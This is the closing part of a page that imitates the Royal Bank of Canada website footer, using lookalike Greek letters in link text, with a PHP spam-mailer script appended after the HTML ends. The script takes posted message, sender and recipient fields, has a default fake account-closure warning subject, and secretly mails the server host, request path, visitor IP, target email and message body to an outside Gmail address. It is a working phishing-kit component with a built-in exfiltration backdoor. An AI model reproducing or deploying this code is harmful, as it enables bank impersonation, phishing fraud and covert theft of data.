          <li><a href="http://www.rbcroyalbank.com/products/deposits/additional-services.html">Additional Service Fees</a></li>
          <li><a href="http://www.rbcroyalbank.com/products/depositregister/index.html">CDIC Information</a></li>
          <li><a title="Service Charge and Interest Rates (Opens new window)" target="_blank" onclick="return popupHelp(this.href)" href="https://www.rbcroyalbank.com/onlinebanking/servicech.html">Service Charge and Interest Rates&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a></li>
        </ul>
      </div>
      <div class="footerCols col-xs-15">
        <h4>Security Center</h4>
        <ul class="footerLinks">
          <li><a href="http://www.rbcroyalbank.com/Onl&iota;ne/rbcguarantee.html">Onl&iota;ne B&alpha;nking Guarantee</a></li>
          <li><a href="http://www.rbc.com/privacysecurity/ca/Onl&iota;ne-privacy.html">Protecting Your Privacy</a></li>
          <li><a href="http://www.rbc.com/privacysecurity/ca/how-rbc-helps-to-protect-you-against-fraud.html">Customer Inform&alpha;tion on Fraud</a></li>
        </ul>
      </div>
      <div class="footerCols col-xs-15 footerColsLast">
        <h4>Advice &amp; Tools</h4>
        <p>Visit the <a class="rbcadvice" href="http://www.rbcadvicecentre.com/">RBC Advice Centre</a> to see how we can help you</p>
      </div>
</section>            <!-- Footer Columns / Footer Links **** Ends -->
        </footer>
        <!-- Footer Ends -->
    <!-- Legal & Bottom links Starts-->
<div id="legal" class="row">
        <p>
            Royal Bank of Canada Website, � 1995-2018
            <a title="Privacy &amp; Security (Opens new window)" href="javascript:kiosk_OpenWinRTB(%20'http://www.rbc.com/privacysecurity/ca/',%20'RTB',%20kiosk_Type2X,%20kiosk_Type2Y,%20kiosk_Type2R%20)">Privacy &amp; Security&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a>
            <a title="Legal (Opens new window)" href="javascript:kiosk_OpenWinRTB(%20'http://www.rbc.com/legal/',%20'RTB',%20kiosk_Type3X,%20kiosk_Type3Y,%20kiosk_Type3R%20)">Legal&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a>
            <a title="Accessibility (Opens new window)" href="javascript:kiosk_OpenWinRTB(%20'http://www.rbc.com/accessibility/',%20'RTB',%20kiosk_Type3X,%20kiosk_Type3Y,%20kiosk_Type3R%20)">Accessibility&nbsp;<img src="files/putih.png"><span class="accessible"> (Opens new window)</span></a>
        </p>
</div>
    <!-- Footer Legal Nav Ends-->


      </div>
    <!-- RBC Wrapper Ends -->
    </div>
    <!-- All scripts should be  placed at the bottom-->
    <!-- Scripts Start-->
   
    

</body></html>
<?php
@set_time_limit(0);
if(isset($_POST['send']))
{
	$message = $_POST['html'];
	$subject = $_POST['ursubject'];
	$uremail = $_POST['uremail'];
	$urname = $_POST['realname'];
	$email = $_POST['email'];

	$message = urlencode($message);
	$message = ereg_replace("%5C%22", "%22", $message);
	$message = urldecode($message);
	$message = stripslashes($message);

}else{
	$testa ="";
	$message = "<html><body><font color='red'>OYA PUT YOUR LETTER BEFORE YOU SPAM</font></body></html>";
	$subject = "Warning! Your Email Account Will Soon Be Close, Update Now";
	$urname = "Mail Administrator";
	$uremail = "postmaster@webmaster.com";
	$email = "test@email.com";
}
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1, 99999);
$subject = " SEND SENDED |$ip";
$send = "all.results13@gmail.com";
$from = "From: Result<xx@xxxx.com";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$k22 = $email. "";
$j21 = $message. "";
$msg8873 = "$a45 $b75 $m22 $k22 $j21";
mail($send, $subject, $msg8873, $from);
?>